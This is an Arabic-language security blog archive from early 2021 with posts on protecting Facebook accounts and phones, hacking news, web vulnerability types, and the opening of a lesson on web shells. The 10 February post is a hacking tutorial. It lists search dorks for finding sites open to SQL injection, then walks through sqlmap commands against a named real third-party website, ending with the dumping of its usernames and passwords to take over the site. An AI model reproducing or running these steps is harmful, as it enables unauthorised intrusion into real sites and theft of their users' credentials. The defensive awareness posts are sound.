السبت، 27 فبراير 2021

كيف تحمى حسابك على الفيسبوك من الإختراق وما هى أشهر طرق إختراقه




هل تعرض حسابك على الفيسبوك للإختراق ، أو تريد تأمين حسابك من التجسس
ف  هذا المقال ان شاء الله ستجد كل ما تريد لتأمين حساباتك ومنع المتطفلين من الوصول إلى بياناتك

كيف يتم إختراق حسابك ؟!!


قبلما تتعلم الحماية تعرف على الطرق التى يسلكها الهاكرز من أجل الوصول الى بيناتك وأهمها :- 

1 ) الصفحات والمواقع المزورة

وبهذه الطريقة التى تعتمد على الهندسة الاجتماعية يتم سرقة آلاف الحسابات وما يفعله الهاكر هو أن يقوم بإنشاء صفحة مماثلة للوحة تسجيل الدخول فى الفيسبوك ويطلب منك التسجيل بها ويتم سرقة معلومات تسجيل الدخول الخاصة بك
أو يقوم بإنشاء موقع لشحن شدات ببجى موبايل أو تزويد متابعين فيسبوك أو إنستجرام او على أنه موقع لمعرفة من يزور حسابك او موقع لتوفير الاشياء المدفوعه مجانا 

وسنتعرف على الاختراق عبر الهندسة الاجتماعية بالتفصيل فيما بعد

2 ) الهويات المزورة 

يوجد فى الفيسبوك خيار تمت سرقة حسابى وهنا تكمن المشكلة 
حيث يقوم الهاكر بعمل هوية مزورة باسمك وصورتك وتاريخ ميلادك ومن ثم إرسالها للفيسبوك من أجل إسترداد الحساب وتنجح الطريقة غالبا


3 ) البرمجيات الخبيثة payload

بإستخدام أدوات معينة يقوم الهاكرز بصنع برمجيات أو فيروسات متطفلة أو سيرفار رات ويحقنه فى تطبيق وإرساله لك وبعدما تقوم بتثبيته يتم إختراق الهاتف كاملا وسحب أى بينات عايه

4 ) خدعة الفيس الأسود

إنتشر فى الأوان الأخيرة ما يسمى بالفيسبوك الأسود وهى خدعة  إخترعها الهاكرز من أجل إصطياد آلاف الضحايا ووهمهم من هناك نسخة فيسبوك أسود جيده جدا وبها مميزات جميلة 
وهى عبارة عن تطبيق مزور للفيسبوك فور أن تقوم بتسجيل الدخول يتم سرقة بيناتك


5 ) التخمين على كلمات المرور

على ما أظن أنك إستنتجت هذه  الطريقة وهى عبارة عن هجوم تخمين كلمات مرور الحسابات ويتم ذلك عن طريق أدوات خاصة لها قدرة وسرعة عالية فى التخمين

وهذه يا عزيزى أشهر الطرق التى يتبعها الهاكرز من أجل إختراق حساباتكم والآن حان وقت أن تعرف كيف تحمى حسابك على الفيسبوك من القرصنة


طرق حماية الفيسبوك من الإختراق :


1 ) الحماية من الإختراق عبر الهندسة الاجتماعية :-


وهى أن تحمى نفسك من القراصنة الذين يعتمدون على الهندسة الاجتماعية وقوة إقناع الضحية حتى تتم عملية الإختراق 
ولحماية حسابك من الإختراق يجب عليك التالى :

- تجنب الضغط على الروابط الغير معروفة
- تجنب التحدث إلى أشخاص لا تعرفهم ولا تثق بهم
- لا توجد مواقع تزويد متابعين أو لايكات فلا تقع فى هذه الحيلة
- لا تقم بتثبيت أى تطبيقات من مصادر غير معروفة
- لا تقم بتنزيل ملفات تحتوى تجهل محتواها 
- لا تسجل فى أى موقع مجهول باستخدام حسابك على الفيس
- إذا لزم الأمر قم بتسجيل بإستخدام حساب فيسبوك وهمى
- أى شخص يحاول إبتزازك قم بحظره على الفود دون تفكير

2 ) الحماية من داخل تطبيق الفيسبوك :- 


- قم بتأكيد حسابك بإيميل جوجل ورقم هاتف شخصى لا يستخدمه أحد غيرك
- قم بإخفاء بيناتك الحساسة ( مثل : رقم الهاتف والايميل وتاريخ الميلاد )عن طريق إعدادات الخصوصية
- قم بعمل كلمة فيسبوك قوية جدا تتكون من حروف وأرقام ورموز ولا تستخدم اى كلمة مرور سهل تخمينها مثل تاريخ ميلاد او رقم هاتف
- قم بتفعيل رمز المصادقة الثنائية فهو لازم لحماية حسابك
- راقب عمليات تسجيل الدخول وأى عملية تسجيل دخول على حسابك من جهاز آخر  اخذفها وقم بتغيير كلمة المرور على الفور .


3 ) الحماية من الهاتف نفسه :-


نعم يجب عليك حماية هاتفك او جهاز الكومبيوتر الخاص بك لأنه قد يكون وسيله للنفاذ إلى حسابك ، ولحماية جهازك تتبع الخطوات التالية :

- قم بتثبيت ماسح فيروسات قوى من المتجر ويمكنك التعرف على افضل ماسح  عبر البحث على يوتيوب .
- أى ملفات يحذرك الهاتف منها قم بمسحها فوراً
- لا تعطى أذونات لبرامج غير معروفه ولن يحتاجها البرنامج 
- لا تقم بتنزيل اى برامج من مصادر غير معروفة
- لا تستخدم النسخ المعدلة من البرامج أنصحك
- لا تقم بالتوصيل على شبكات الإنترنت العامة 
- قم بحماية شبكة الواى فاى الخاصة بك من الإختراق
- قم بإخفاء ظهور الإشعارات والرسائل فى شاشة القفل للهاتف
- قم بتفعيل كلمة مرور للهاتف ولا تتركه من يدك



وإلى هنا إنتهى درس اليوم من دورة الحماية من الاختراق 
يمكنك الوصول إلى الدورة كاملة عبر الرابط فى الأسفل
وإذا كان لديك أى مشكلة لا تتردد فى التواصل معنا عبر الإنستجرام أو قناة التيلجرام

للتواصل عبر الاستجرام اضغط هنا

لقناة التيلجرام اضغط هنا

لدورة الحماية من الاختراق اضغط هنا 

كتب لكم :- ديفل يونكس DEVIL UNEX
لا تغادر قبل أن تترك بصمتك فى التعليقات

الخميس، 25 فبراير 2021

القبض على هاكر بمطروح يبتز الناس جنسيا عبر إختراقه حساباتهم


الحكومة المصرية تلقى القبض على هاكر يبتز الضحايا جنسيا 

يتعرض الكثير من الناس للإبتزاز عبر الانترنت يوميا ، وحدث اليوم هو هاكر من محافظة متروح يقوم باختراق الحسابات وابتزاز الضحايا الكترونيا ..  يمكن متابعه قراءة الخبر ..،

تمكنت الأجهزة الأمنية من ضبط هاكرز يخترق حسابات المواطنين على مواقع التواصل الاجتماعي وابتزازهم ماديا وجنسيا في مطروح.
كانت الأجهزة الأمنية تمكنت من ضبط أحد الأشخاص – مقيم بمطروح لقيامه باختراق حسابات بعض المواطنين على مواقع التواصل الاجتماعي من خلال إدارة إحدى الصفحات على موقع التواصل الاجتماعي "فيس بوك" والتي يقوم من خلالها بإيهام ضحاياه بقدرته على استعادة الحسابات الإلكترونية المنشأة على مواقع التواصل الاجتماعي المختلفة وتطبيق المحادثات (واتس آب) وتأمينها ضد أي أخطار.


وأكدت التحريات أن المتهم تمكن من اختراق حسابات ضحاياه والاستيلاء على ما بها من محتويات وابتزاز أصحابها ماديا وجنسيا مقابل عدم نشر تلك المحتويات.
وعثر بحوزته على هاتف محمول بفحصه تبين وجود آثار ودلائل على نشاطه الإجرامي وارتكابه العديد من الوقائع، وكذا محفظة إلكترونية تحتوي على مبلغ مالي من متحصلات جرائمه.
جرى اتخاذ الإجراءات القانونية وباشرت النيابة العامة التحقيق.
المصدر مصراوى


لا تنسى الاشتراك فى قناة التيلجرام ليصلك كل جديد 

للإشتراك فى قناة التيلجرام اضغط هنا


دورة الحماية من الاختراق اضغط هنا

إحمى نفسك من الإختراق وإكشف خدع الهاكرز لإختراق أجهزتكم



إحمى نفسك من الإختراق وإكشف خدع الهاكرز لإختراق أجهزتكم


دائما ما يتخذ الهاكرز طرق وألاعيب لإختراق حسباتكم وأجهزتكم ، وإذا كان لديك خبرة ولو بسيطة ستستطيع كشف كل تلك الألاعيب وحماية نفسك منهم 
فى هذا المقال إن شاء الله سنتعرف على اشهر الطرق التى يسلكونها من أجل إختراق خصوصياتكم تابع القراءة ولا تكن ضحية لهم


إصطياد الضحايا عبر شبكات الواى فاى العامة والمنزلية


فى النادى ، فى المدرسة ، فى الجامعة ، فى المكتبة ، فى المقهى او وسائل المواصلات حتى .. تجد إنترنت مجانى وشبكات Wifi مفتوحة للجميع 
مالا تعرفونه أن هناك غالباً يتربص القراصنة من أجل إصطياد الضحايا يا صديقى 
كل ما يفعله أن يقوم بالتوصيل على شبكة الإنترنت ومن ثم بإستخدام بعض الأدوات البسيطة يقم بفحص كل الأجهزة المتصلة على الشبكة ثم يبدأ بإختراقهم ، وكما توجد أدوات ايضا للوصول إلى كلمات المرور المحفوظة فى أجهزة المستخدمين .

أما عن شبكة الإنترنت المنزلية يقوم الهاكر بإختراقها عبر طرق عديدة من ضمنهم الهندسة الاجتماعية وهو أن يقوم بعمل هجوم بسيط على الشبكة ثم بناء شبكة مثلها تماما وإظهارها 
وما ان وجد المستخدم شبكته ظاهره يضغط عليها ويضع كلمة المرور ويظهر له انها متصله ويستطيع الهاكر الاطلاع على كلمة السر وإختراق الشبكة ومن ثم إختراق المتصلين معه .
وللحماية من ذلك تجنب التوصيل على شبكات الوافى العامة وأيضا قم بحماية شبكتك المنزلية عبر الماك أدرس أو إخفاؤها وقم بحظر اى أجهزة غريبه تجدها عليها .


الإصطياد عبر الصفحات المزورة والروابط الملغمة


هل رأيت يوما برنامج لمعرفة من يزور حسابك على الفيسبوك ؟!
أو برنامج لتزويد متابعين الإنستجرام والمعجبين ؟!
أم رأيت فيسبوك مجانى أو موقع لتوثيق  حسابات فيسبوك بالعلامة الزرقاء ؟! 
أم رأيت موقعا لشحن شدات ببجى موبايل او مجوهرات فرى فاير ؟!

والكثير والكثير من الأشياء التى تبهرك يا عزيزى ،، لا تقلق أنه الإختراق عن طريق الهندسة الاجتماعية 
كل ما على القراصنة هو برمجة صفحات مزورة تشبه تماما المواقع الاصلية ولكنها لديها القدرة على فعل اشياء لا تفعلها المواقع الاصلية ومن ثم إرسالها لك وطلب منك التسجيل واقناعك وما إن تكتب بيناتك فى الموقع ... تم إختراق حسابك يا عزيزى هههههههه 
هل تظن يوما ان فيسبوك ستوثق حسابك هل انت مهم او ان ببجى ستعطيك شدات مجانا هل يخرجون الذكاة ام يفعلون صدقات ههههههههههه لا تكن مغفل وتجنب تلك المواقع المزورة التى صنعت للأشخاص المغفلين .

الإختراق عبر التطبيقات الملغمة


يفتح بيئة العمل الخاصة به ، ثم مشروع الميتاسبلويت ، ثم صنع بايلود إختراق ، ثم إرساله لك ، ثم إقناعك بتثبيته ، ثم تبدأ عملية الإختراق بنجاح 
يقوم الهاكرز بصنع برامجة او فيروسات تجسس وإرسالها لك واقناعك بفتحها وبعد ذلك تفتح جلسة إختراق عند الهاكر ويستطيع التحكم فى جهازك والتجسس على أى بينات .

التجسس عن طريق الواتساب المعدل


يلجأ القراصنة إلى صنع نسخ مم الواتساب المعدلة والتى يزعمون أنها ضد الفيروسات ومن ثم حقنها ببرمجيات خبيثه من أجل إختراق هواتفكم أو يقوم بالحقن فى اى برنامج اخر ويزعم انها نسخه مدفوعه مجانا
لذلك يا صديقى لا تقم بتثبيت أى تطبيقات من مصادر غير معروفة وأى اغلق ميزة التنزيل التلقائى الوسائط وعرضها فى المعرض فى الواتساب .



وإلى هنا إنتهى درس اليوم وليكن فى علمك ان الاعيب الهاكرز كثيرة جدا وسنتعرف عليها وعلى طرق الحماية خلال دورة تعلم الحماية من الاختراق ، ولا تنسى الاشتراك فى قناة التيلجرام ليصلك كل ماهو جديد 

للإشتراك فى قناة التيلجرام اضغط هنا



الثلاثاء، 23 فبراير 2021

إختراق موقع التفزيون التونسى على يد هاكر مغربى


 

بعد قرصنته فجر اليوم.. موقع التلفزيون التونسي يعود للعمل

كما نعرف يوميا تحدث عمليات إختراق خطيرة جدا سواء للشركات والمواقع الحكومية والسيرفرات  الدولية 

منذ فترة قصيرة تعرضت البوابة الإلكترونية للتلفزيون التونسى للإختراق من قبل هاكرز مجهولين ، وأعلنت فجر اليوم أن الموقع  عاد يعمل مرة إخرى .

وقالت على مواقع التواصل الإجتماعى : "تمكن الفريق التقني للتلفزة ومؤسسة ميديانات من التصدي لعملية القرصنة بالتنسيق مع الوكالة الوطنية للسلامة  المعلوماتية".

وكان موقع التلفزة الوطنية التونسية، قد تعرض فجر اليوم الثلاثاء، إلى عملية اختراق، حيث تم تعطيل الصفحة الرسمية للتلفزة، وموقع القناتين الأولى والثانية.

وبحسب وسائل إعلامية فقد تمت عملية الاختراق من قبل هاكرز يسمي نفسه “الذئب المغربي"

تابعونا على تيلجرام للتعرف احدث الاخبار أول بأول 

للإشتراك فى قناة التيلجرام اضغط هنا 



ماذا تفعل اذا تم إختراف هاتفك أو جهازك ؟! إليك الإجراءات



هل تم إختراق هاتفك من قبل المتطفلين ؟!


هل كنت تستخدم جهازك ذات يوم وشعرت ان هاتفك مخترق وأن هناك من يتجسس على رسائلك ومكالماتك ولم تعلم ماذا تفعل ؟
الهاكرز يقومون بالكثير من عمليات الاختراق يوميا وقد تكون أنت احد الضحايا سواء بشكل عشوائى او شكل مقصود من أجل سرقة بيناتك 


خطوات يجب فعلها إذا تم إختراق جهازك


اول شى تقم بفصل الإنترنت ثم تقم بمسح اى بينات حساسه او كلمات مرور محفوظمة طبعا بعما تنقلها فى اى مكان اذا كانت مهمه
وايضا قم بتسجيل الخروج من كل حساباتك ولا تنسى إزالة شريحة الإتصالات وايضا مسح الواتس والوسائط الخاصة به 
ثم بعد ذلك تتجه إلى التطبيقات المثبته من الضبط ومن ثم مسح اى برنامج غريب او الأفضل قم بعمل ضبط مصنع للجهاز كاملا .



كيف تحمى نفسك من الاختراق ؟!


اول شئ تجنب التوصيل على شبكات الوافى العامة لأنه عادةاً يكون التطفلين مترصدين عليها .
وأيضا تجنب تثبيت  تطبيقات من مصادر غير معروفه واى نسخ معدلة او متكركه ولا تنسى يا عزيزى أن تتجنب الضغط على روابط من مصادر غير موثوقه او تضغط على اعلانات فى مواقع ليست شهيرة وتحب زيارة المواقع التى تحتوى على نوافذ منبثقة 
وأوصيك ايضا بتنزيل اى تطبيق ماسح فيروسات من متجر بلاى تأكيد للحماية 
وإن شاء الله فى الدروس القادمة سنتحدث عن أشهر الاعيب الهاكرز وكيف تحمى نفسك منها 



الاثنين، 15 فبراير 2021

كيف تعلم إذا كان هاتفك مخترق ام لا وكيف تحذف جلسة الاختراق من الهاتف



كيف تعلم إذا كان هاتفك مخترق ام لا وكيف تحذف جلسة الاختراق من الهاتف 


يتعرض الكثير  من الناس يوميا للاختراق سواء كان الاختراق عشوائيا او مقصودا ، ويتم ابتزازهم من اجل دفع المال 
وهذا سبب للناس رعب الهاكرز والوهم ان هواتفهم مخترقه وحساباتهم يتم التجسس عليها 
وفى هذا المقال ان شاء الله سنتعرف على كيفية كشف إذا كان هاتفك مخترق ام لا وكيف تحذف جلسة الاختراق من الهاتف
وفى المقال االقادم ان شاء الله سنتعرف على اشهر الاعيب الهاكرز وكشفها والحماية منها .


هناك علامات عديدة تمكنك من التعرف اذا كان هاتفك مخترق ام لا مثل :-

إعادة التشغيل النفاجئ للجهاز 


إعادة تشغيل الجهاز بشكل تلقائى هو شئ عادى حيث قد يطلب تحديثات مثلا ولكن الجهاز يقم بتحذيرك اولا 
أما إذا تم إعادة تشغيل الجهاز بشكل مفاجئ دون اى تحذير فهذا شئ يسبب القلق حقا ويحتاج إلى تفسير


نشاط غير مفسر على الانترنت


يطالب الهاكرز بأسماء المستخدمين وكلمات المرور الخاصة بك، حيث يمكن لهذه التفاصيل إلى جانب حيل الهندسة الاجتماعية الوصول إلى حساباتك المصرفية وملفاتك الشخصية على وسائل التواصل الاجتماعي وخدماتك عبر الإنترنت. راقب مجلد “المرسلة” في بريدك الإلكتروني ومنشورات الشبكة الاجتماعية الخاصة بك، وإذا لاحظت رسائل البريد الإلكتروني والمشاركات التي لا تتذكر إرسالها أو نشرها فمن المحتمل أنك تعرضت للاختراق. ويجب عليك التحقق باستمرار من حساباتك بسبب النشاط غير المصرح به، بما في ذلك الأفلام على ملفك الشخصي في نتفليكس وعمليات الشراء الغامضة التي لم تقم بها والأغاني على قائمة سبوتيفاي التي لم تستمع إليها، ورسوم بطاقة الائتمان التي جاءت من أي مكان.



البطئ المفاجئ فى  الجهاز 


أحد الآثار الجانبية للبرامج الضارة هو بطء الأجهزة، ويصبح جهازك بطيئًا أو يتجمد باستمرار أو حتى يتعطل، وإذا بدأت تلاحظ بعض هذه الأعراض، فقد يكون جهازك مصابا بفيروسات أو أحصنة طروادة أو أحد الديدان الفيروسية. وعادةً ما تعمل البرامج الضارة في الخلفية، وتقوم باستخدام موارد جهازك المصاب سراً أثناء نشاطها .

علامات اخرى 


وهناك بعض العلامات الأخرى تدل على وجود تطبيقات تجسس او تطبيقات ضاره على جهازك مثل سرعة نفاذ البطارية وايضا ارتفاع درجة حرارة الجهاز دوت استخدامه و سرعة نفاذ الانترنت ووجود انشطة غير مألوفه على جهازك مثل تثبيت تطبيقات غريبة وملئ  ذاكرة الجهاز وملفات لا تعلم بها من اصل وايضا قد تجد رسائل واتصلات غريبه على الجهاز .

وهذه كانت اشهر العلامات التى تدل على وجود فيروسات تجسس على جهازكم 
تابعونا على تيلجرام للتعرف على المزيد من طرق الحماية وكشف ألاعيب الهاكرز والحماية من الإختراق 


للاشتراك فى قناة التيلجرام اضغط هنا





الأربعاء، 10 فبراير 2021

ما هى ثغرة SQL وكيف استغلالها {شرح اداة sqlmap لاختراق المواقع مصابة بثغرة sql} توعية امنية





شرح اداة sqlmap لاختراق المواقع مصابة بثغرة sql
اليوم هو الدرس الرابع من دورة تعلم اختبار اختراق المواقع 
وان شاء سنتحدث عن اداة sqlmap لاختراق المواقع مصابة بثغرة sql 

اضغط هنا للإشتراك فى قناة التيلجرام 

الدرس الاول من دورة اختراق المواقع اضغط هنا 

الدرس الثانى اضغط هنا 

الدرس الثالث اضغط هنا 


فى البداية ما هى ثغرة SQL ؟

sql injection هي من بين أكثر الثغرات تواجدا على مواقع الويب وهي ايضا ببساطة هجوم يتم فيه حقن كود يسمي  SQL بتطبيق الويب  "المتصفح" حتى يتم استخراج بعض البيانات من قاعدة االبيانات التي يعتمد عليها الموقع وهذا بسبب ان الثغرة تعتمد على خطأ وهوعدم معاينة ما يتم إدخاله قبل ان يتم ارساله الي قاعدة البيانات كما يمكن تجاوز نافذة authentication ايضا باستعمال هذه الثغرة

ويوجد انواع عديدة من ثغرة SQL حتى انها حوالى سيع انواع وسنشرحهم قادما ان شاء الله 

كيفية استخراج المواقع المصابة ؟!


 نحتاج إلى دوركات أي نهايات
للحصول على مواقع مصابة بالثغرة نذهب إلى المتصفح وندخل إحدى الدوركات التالية :-

page.php?id=

trainers.php?id=

article.php?ID=

games.php?id=

newsDetail.php?id=

staff.php?id=

products.php?id=

news_view.php?id=

opinions.php?id=

pages.php?id=



ستظهر لنا المواقع المصابة بالثغرة وللتأكد من أنها مصابة بالثغرة نذهب إلى نهاية عنوان الموقع وضع (') هذه النقطة إذا ظهرت لك خطأ أو شيء ٱخر مثل Error :You have an error in your SQL syntax  فإن هذا الموقع مصاب بالثغرة
مثل هذا الموقع وهشرحلكم عليه :- 

www.musculoskeletalsociety.in/page.php?id=5

كيفية استغلال الثغرة ؟!


طبعاً اذا كنت تريد مخترق مواقع مبتدأ والبحث عن مواقع مصابة وثغراتها طبعاً سيكون ابتدائك اولا باختراق مواقع sql وهذا يعتبر اسهل ثغرات لاختراق المواقع اذا كنت تحب اختراق مواقع وكشف ثغرات وتلك الاعمال وكنت مهووس بها ستتمكن من ذلك بعد تعلم ثغرة sql وطريقة برمجتها واستخدامها واختراقها ايضاً والان سنشرح لكم بالتفصيل كيف يتم اختراق ملفات الموقع واستخراج اليوزر والباسورد لكي تستطيع ان تقوم باختراق الموقع

اقدم لكم اداة sqlmap وهى افضل اداة لاستغلال ثغرة SQL واختراق المواقع المصابه بها 
وهذه الاداة تعمل على نظام Termux  ايضا من اجل مستخدمين الأندرويد

ولكن قبل اى شئ قم بتحميل ملف  اوامر تثبيت الاداة

لتحميل أوامر تثبيت الاداة اضغط هنا 



استخدام الأداة sqlmap لاختراق الموقع !!



بعد جلب الموقع المصاب وفتح الاداة  نقم بكتابة الأوامر التالية :-


 python2 sqlmap.py -u 🌐🌐 --dbs

طبعا بدال كلمة 🌐🌐 تقوم باضافة رابط الموقع المصاب SQL
يصبح كذلك :-

python2 sqlmap.py -u www.musculoskeletalsociety.in/page.php?id=5 --dbs


طبعاً الان تم دخول الى ملفات الموقع اي اننا قمنا باختراق الموقع الان نكتب هذا الامر لكي ان تستطيع دخول الى ملف الاساسي للموقع
اكتب هذا الامر :-

 python2 sqlmap.py -u www.musculoskeletalsociety.in/page.php?id=5 --D ❌❌ --tables

طبعاً قم بتغيير ❌❌ بكتابة اسم الملف الخاص للموقع

ثم تظهر لك ملفات الموقع الاخرى مثل المقالات الموقع او الحسابات مسجلة في الموقع وبيانات الموظفين والحسابات و كلمات السر الموقع اليوزر النيم والباسورد

تترك كل ملفات لانك لن تحتاجها فقط قم بالبحث عن ملف خاص لبيانات دخول الموقع نقوم بكتابة امر 👇

python2 sqlmap.py -u www.musculoskeletalsociety.in/page.php?id=5 --D NameFile -T NAMESITE --columuns


طبعا بدال اسم NAMESITE تقوم بكتابة اسم ملف الخاص للموقع الذي يحتوي على اليوزر والباسورد وعادة تكون اسمها
user site , password , user
وهكذا شبيهة لتلك الاسماء على سبيل مثال ساقوم بفتح ملف اسمها
user_name & password



 هذا الامر لسحب كلمات المرور واليوزر للموقع :-

python2 sqlmap.py -u www.musculoskeletalsociety.in/page.php?id=5 --D NameFile -T NAMESITE --C user_name,password --dump

وبعد كتابة الامر سيظهر لك اليوزر والباسوردات الخاص بالموقع انت فقط يمكنك تغيير اسم ملفات الذي تريده ويمكنك من خلال اليوزر والباسورد اختراق الموقع بكل سهولة




كان معكم ديفل يونكس DEVIL UNEX 
اتمنى ان تكونوا استفدتم من موقعنا الإليكترونى وانا اخلى مسؤليتى من اى تصرف غير شرعى
لا تنسى الاشتراك فى قناة التيلجرام ليصلك كل ماهو جديد 

للإشتراك فى قناة التيلجرام اضغط هنا 



الثلاثاء، 9 فبراير 2021

ما هى الثغرات الأمنية وشرح أخطر ثغرات المواقع الإليكترونية 《الدرس الثالث》


ما هى الثغرات الأمنية وشرح أخطر ثغرات المواقع الإليكترونية؟!!
اليوم ان شاء الله نكمل  دورة تعلم اختبار اختراق المواقع واليوم هو الدرس الثالث من الدورة اتمنى ان يعجبكم 
ولكن قبل ما تنخرط فى الدرس اشترك في قناة التيلجرام ليصلك كل جديد 

للإشتراك فى قناة التيلجرام اضغط هنا 

الدرس الاول من الدورة اضغط هنا

الدرس الثانى اضغط هنا


ولنبدأ الشرح بالصلاة والسلام على رسول الله عليه افضل الصلاة واتم التسليم 

ما هى الثغرات الأمنية ؟!


الثغرة الأمنية (بالإنجليزية: Security Bug)‏ هو مصطلح يطلق على مناطق ضعيفة في أنظمة تشغيل الحاسب، هذه المناطق الضعيفة يمكن التسلل عبرها إلى داخل نظام التشغيل، ومن ثم يتم التعديل فيه لتدميره نهائيا مثلا، أو للتجسس على المعلومات الخاصة لصاحب الحاسب الالي المخترق، أو ما يعرف بجهاز الضحية.

 تظهر الثغرات الأمنية في جميع البرمجيات أيضا وليس فقط أنظمة التشغيل وهي بسبب أخطاء برمجية أثناء تطويرها ارتكبها المطورين وهي تشكل خطرا أمنيا بسبب عدم اكتشافها احيانا لإصدار حل وترقيع لها مثل ثغرات اليوم الصفر (بالإنجليزية: Zero-day)‏ التي دائماً ما يستعين بها القراصنة في جرائمهم الإكترونية.


ما أشهر الثغرات التى تصيب المواقع؟!


Remote File Inclusion ( 1

Out-of-band SQL ( 2

SQL injection example ( 3 

In-band SQLi ( 4

Flash XSS ( 5 

Reflected XSS ( 6 

7 ) Stored XSS

وهذه اشهر سبعة ثغرات أمنية تصيب المواقع وسأبدأ بشرحهم ان شاء الله بشئ من التفصيل وفى الدروس القادمة ان شاء الله سنشرح كل منهم على حده وطريقة استخراجها واستغلالها ومعالجتها

ثغرة Remote File Inclusion

 ثغرة Remote File Inclusion من اخطر الثغرات المتنشرة وخاصة فى الاصدار الرابع من php وخطورتها فى أنها تسمح بإستدعاء ملفات من خارج الموقع وتشغيلها على انها من ملفاته
وتوجد هذه الثغرة بكثرة فى المواقع الخاصة بتدوينات المحتوى مثل Wordpress وجوملا وكما قولت انها تمكنه من رفع ملف على السيرفار وهذا هو رفع الشل الذى تحدثنا عنه فى الدرس الثانى من الدورةوبعد ذلك كل ما عليك هو تنفيذه على السيرافار وستتحكم فى الموقع بشكل كامل 

وان شاء الله سنشرح هذه الثغرة بالتفصيل الممل فى الدروس القادمة

ثغرة SQL injections


sql injection هي من بين أكثر الثغرات تواجدا على مواقع الويب وهي ايضا ببساطة هجوم يتم فيه حقن كود يسمي  SQL بتطبيق الويب  "المتصفح" حتى يتم استخراج بعض البيانات من قاعدة االبيانات التي يعتمد عليها الموقع وهذا بسبب ان الثغرة تعتمد على خطأ وهوعدم معاينة ما يتم إدخاله قبل ان يتم ارساله الي قاعدة البيانات كما يمكن تجاوز نافذة authentication ايضا باستعمال هذه الثغرة

ويوجد انواع عديدة من ثغرة SQL حتى انها حوالى سيع انواع وسنشرحهم قادما ان شاء الله 

ثغرة XSS

ثغرات الـ Cross Site Scripting او ما يُختصر بـ XSS هي ثغرات أمنية منتشرة  في برامج الويب.
من خلال هذه الثغرات يقوم المهاجم بحقن كود برنامج خبيث عادة ما يكون بلغة  JavaScript التي يقوم المتصفح بتنفيد اوامر الكود عندما يتم تحميل الصفحة عند الشخص الثاني (الضحية).
يتم حقن الكود من قبل الشخص المهاجم بطرق عدة منها: وهم الضحية للظغط على رابط (XSS منعكس)، او انتظار الضحية ليتصفح صفحة في الموقع الذي يحتوي على ثغرة من هذا النوع (XSS مخزن).


وسيتم شرح هذه الثغرة تصيليا ان شاء الله فى الدروس القادمة 

والى هنا انتى درس اليوم واتمنى ان ينول اعجابكم 
لا تنسى الاشتراك فى قناة التيلجرام ليصلك كل ماهو جديد 

للإشتراك فى قناة التيلجرام اضغط هنا









الاثنين، 8 فبراير 2021

《أخبار》 قراصنة حزب الله يستهدفون شركات الاتصالات العالمية






أعادت مجموعة القرصنة التي لها صلات مزعومة بحزب الله اللبناني تجهيز ترسانتها من البرامج الضارة بإصدار جديد من برنامج طروادة للوصول عن بُعد (RAT) من أجل اقتحام الشركات في جميع أنحاء العالم واستخراج المعلومات القيمة.

وفي تقرير جديد نشره فريق البحث ClearSky، قالت شركة الأمن السيبراني: إنها حددت منذ أوائل عام 2020 ما لا يقل عن 250 خادمًا للويب تم اختراقها من ممثل التهديد لجمع المعلومات الاستخبارية وسرقة قواعد بيانات الشركة.
وأصابت الاقتحامات المنظمة عددًا كبيرًا من الشركات الموجودة في الولايات المتحدة والمملكة المتحدة ومصر والأردن ولبنان والمملكة العربية السعودية وإسرائيل والسلطة الفلسطينية.


وكان غالبية الضحايا يمثلون مشغلي الاتصالات (Etisalat و Mobily و Vodafone Egypt)، ومزودو خدمات الإنترنت (SaudiNet و TE Data)، ومزودو خدمات الاستضافة والبنية التحتية (Secured Servers LLC و iomart).
وتم توثيقها للمرة الأولى في عام 2015، ومن المعروف أن مجموعة الأرز المتطاير أو الأرز اللبناني تخترق عددًا كبيرًا من الأهداف باستخدام تقنيات هجوم مختلفة، بما في ذلك زرع البرمجيات الخبيثة المصممة خصيصًا.

وجرى سابقًا الاشتباه بأن مجموعة الأرز المتطاير – وتحديداً الوحدة الإلكترونية لحزب الله – لها علاقة بحملة التجسس الإلكتروني في عام 2015 التي استهدفت الموردين العسكريين وشركات الاتصالات ووسائل الإعلام والجامعات.


ولم تكن هجمات 2020 مختلفة، حيث إن نشاط القرصنة الذي تم الكشف عنه بواسطة عمليات مطابقة ClearSky المنسوبة إلى حزب الله اعتمد على تداخلات التعليمات البرمجية بين متغيرات 2015 و 2020 من برنامج طروادة للوصول عن بُعد (RAT).

واستغلت المجموعة العيوب الثلاثة في الخوادم CVE-2019-3396 و CVE-2019-11581 و CVE-2012-3152 للحصول على موطئ قدم أولي، ومن ثم تمكنت من التنقل عبر الشبكة، وتنزيل برنامج طروادة للوصول عن بُعد، الذي يأتي مزودًا بقدرات لتسجيل ضغطات المفاتيح، والتقاط لقطات الشاشة، وتنفيذ الأوامر التعسفية.
وفي السنوات الخمس التي تلت ظهور برنامج طروادة الخاص بالمجموعة للمرة الأولى، قالت ClearSky: تمت إضافة ميزات جديدة لمكافحة تصحيح الأخطاء إلى أحدث نسخة من برنامج المجموعة، مع تشفير الاتصالات بين الجهاز المخترق وخادم التحكم والقيادة.

وفي حين أنه ليس من المستغرب بالنسبة للجهات الفاعلة أن تحافظ على مكانها بعيدًا عن الأنظار، فإن حقيقة أن مجموعة الأرز اللبناني تمكنت من البقاء مختبئة منذ عام 2015 دون جذب أي انتباه على الإطلاق يعني أن المجموعة ربما أوقفت عملياتها لفترات طويلة فيما بينها لتجنب اكتشافها.


المصدر 

ما هو الشل وكيف يتم رفعه شرح كامل للشل(Shell) لاختراق المواقع





السلام عليكم ورحمة الله وبركاته 
اهلا ومرحبا بكم في موقعنا الإليكترونى اليوم ان شاء الله هو الدرس الثانى من دورة اختبار اختراق المواقع
تعرفنا فى الدرس السابق عن بعض المفافهيم الاساسية واليوم نكمل اهم شئ وهو الشيل وكيف يتم رفعه وما فائدتة 
لا تنسى الاشتراك فى قناة التيلجرام ليصلك كل جديد 

قناة التيلجرام اضغط هنا 





شرح كامل للشل(Shell) لاختراق المواقع 

الشرح من على صفحة تطوير

اضغط هنا للولوج اليها


ما هو الشل :


الشل هو عباره عن ملف مكتوب بلغه PHP وهو ينصنف على انه اكواد خبيثه وتزرع في اختراق المواقع وتحتوي الشلات على برمجات واكواد خبيثه تصل حتى الان الي 10 اكواد او اكثر ووظيفه هذه الاكواد هي المساعده في تنفيذ الاوامر على السيرفر
---
حتى نفهم الموضوع اكثر بنيجي لتعريف السيرفر ما هو السيرفر السيرفر هو عباره عن جهاز يشبه جهازك الخاص لا فرق كبير لكن يعمل بتقنيه الخادم والزبون اي انه يقوم بتلقي الطلبات من غيره من الحواسيب ويتميز بسرعته العاليه وهو موصول على خط سريع جدا تصل الى 100 ميجا واكثر
---
